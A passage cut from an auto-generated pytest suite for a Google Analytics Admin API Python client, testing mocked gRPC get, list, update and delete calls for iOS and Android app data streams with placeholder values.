"grpc_asyncio", request_type=analytics_admin.UpdateIosAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", bundle_id="bundle_id_value", display_name="display_name_value", ) ) response = await client.update_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.IosAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.bundle_id == "bundle_id_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_update_ios_app_data_stream_async_from_dict(): await test_update_ios_app_data_stream_async(request_type=dict) def test_update_ios_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateIosAppDataStreamRequest() request.ios_app_data_stream.name = "ios_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: call.return_value = resources.IosAppDataStream() client.update_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "ios_app_data_stream.name=ios_app_data_stream.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_ios_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateIosAppDataStreamRequest() request.ios_app_data_stream.name = "ios_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) await client.update_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "ios_app_data_stream.name=ios_app_data_stream.name/value", ) in kw["metadata"] def test_update_ios_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_ios_app_data_stream( ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].ios_app_data_stream == resources.IosAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_ios_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_ios_app_data_stream( analytics_admin.UpdateIosAppDataStreamRequest(), ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_ios_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_ios_app_data_stream( ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].ios_app_data_stream == resources.IosAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_ios_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_ios_app_data_stream( analytics_admin.UpdateIosAppDataStreamRequest(), ios_app_data_stream=resources.IosAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_ios_app_data_streams( transport: str = "grpc", request_type=analytics_admin.ListIosAppDataStreamsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListIosAppDataStreamsResponse( next_page_token="next_page_token_value", ) response = client.list_ios_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListIosAppDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListIosAppDataStreamsPager) assert response.next_page_token == "next_page_token_value" def test_list_ios_app_data_streams_from_dict(): test_list_ios_app_data_streams(request_type=dict) def test_list_ios_app_data_streams_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: client.list_ios_app_data_streams() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListIosAppDataStreamsRequest() @pytest.mark.asyncio async def test_list_ios_app_data_streams_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListIosAppDataStreamsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListIosAppDataStreamsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_ios_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListIosAppDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListIosAppDataStreamsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_ios_app_data_streams_async_from_dict(): await test_list_ios_app_data_streams_async(request_type=dict) def test_list_ios_app_data_streams_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListIosAppDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: call.return_value = analytics_admin.ListIosAppDataStreamsResponse() client.list_ios_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_ios_app_data_streams_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListIosAppDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListIosAppDataStreamsResponse() ) await client.list_ios_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_ios_app_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListIosAppDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_ios_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_ios_app_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_ios_app_data_streams( analytics_admin.ListIosAppDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_ios_app_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListIosAppDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListIosAppDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_ios_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_ios_app_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_ios_app_data_streams( analytics_admin.ListIosAppDataStreamsRequest(), parent="parent_value", ) def test_list_ios_app_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_ios_app_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.IosAppDataStream) for i in results) def test_list_ios_app_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) pages = list(client.list_ios_app_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_ios_app_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) async_pager = await client.list_ios_app_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.IosAppDataStream) for i in responses) @pytest.mark.asyncio async def test_list_ios_app_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_ios_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), resources.IosAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[], next_page_token="def", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[resources.IosAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListIosAppDataStreamsResponse( ios_app_data_streams=[ resources.IosAppDataStream(), resources.IosAppDataStream(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_ios_app_data_streams(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.GetAndroidAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) response = client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" def test_get_android_app_data_stream_from_dict(): test_get_android_app_data_stream(request_type=dict) def test_get_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: client.get_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_get_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) ) response = await client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_get_android_app_data_stream_async_from_dict(): await test_get_android_app_data_stream_async(request_type=dict) def test_get_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: call.return_value = resources.AndroidAppDataStream() client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) await client.get_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_android_app_data_stream( analytics_admin.GetAndroidAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_android_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_android_app_data_stream( analytics_admin.GetAndroidAppDataStreamRequest(), name="name_value", ) def test_delete_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_android_app_data_stream_from_dict(): test_delete_android_app_data_stream(request_type=dict) def test_delete_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: client.delete_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_delete_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_android_app_data_stream_async_from_dict(): await test_delete_android_app_data_stream_async(request_type=dict) def test_delete_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: call.return_value = None client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAndroidAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_android_app_data_stream( analytics_admin.DeleteAndroidAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_android_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_android_app_data_stream( analytics_admin.DeleteAndroidAppDataStreamRequest(), name="name_value", ) def test_update_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.UpdateAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) response = client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" def test_update_android_app_data_stream_from_dict(): test_update_android_app_data_stream(request_type=dict) def test_update_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: client.update_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_update_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) ) response = await client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_update_android_app_data_stream_async_from_dict(): await test_update_android_app_data_stream_async(request_type=dict) def test_update_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of 